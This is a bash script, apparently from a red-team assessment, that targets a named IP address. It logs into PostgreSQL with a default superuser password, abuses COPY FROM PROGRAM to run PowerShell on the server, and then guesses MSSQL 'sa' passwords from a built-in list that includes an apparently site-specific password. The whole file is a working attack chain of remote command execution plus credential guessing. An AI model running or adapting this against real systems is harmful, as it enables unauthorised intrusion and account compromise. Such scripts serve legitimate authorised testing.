#!/bin/bash
# L6: probe MSSQL$SQLEXPRESS14 auth on 14.225.11.57 via sqlcmd (read-only queries only)
# Tests: Windows auth (current NETWORK SERVICE ctx) + common sa passwords.
set -u
OUT="/root/ir-assessment/redteam/gitlab_vdss_com_vn/L6_mssql_auth_raw.txt"
PSQL="host=14.225.11.57 port=5432 user=superuser_user dbname=postgres connect_timeout=10"
export PGPASSWORD='postgres'

{
  echo "===L6 MSSQL AUTH PROBE 14.225.11.57 $(date -u) ==="
  psql "$PSQL" -v ON_ERROR_STOP=1 -At <<'SQL'
DROP TABLE IF EXISTS pg_temp.a;
CREATE TEMP TABLE a(line text);
COPY a FROM PROGRAM $cmd$powershell -NoProfile -Command "$sqlcmd='C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\SQLCMD.EXE'; if(-not (Test-Path $sqlcmd)){ $sqlcmd=(Get-Command sqlcmd.exe -ErrorAction SilentlyContinue).Source }; Write-Output ('SQLCMD=' + $sqlcmd); Write-Output '===WINAUTH==='; & $sqlcmd -S 'localhost\SQLEXPRESS14' -E -Q 'SELECT SYSTEM_USER, USER_NAME()' -l 5 2>&1 | Out-String; foreach($pw in @('sa','password','sa123','Ctech2022!@#','123@123a','admin','sql','Password1')){ Write-Output ('===SA_TRY:' + $pw + '==='); & $sqlcmd -S 'localhost\SQLEXPRESS14' -U sa -P $pw -Q 'SELECT 1' -l 5 2>&1 | Out-String }; Write-Output '===DONE==='$cmd$;
SELECT line FROM a;
SQL
  echo "===PSQL_EXIT=$?==="
} > "$OUT" 2>&1

echo "--- output file: $OUT ---"
wc -l "$OUT"
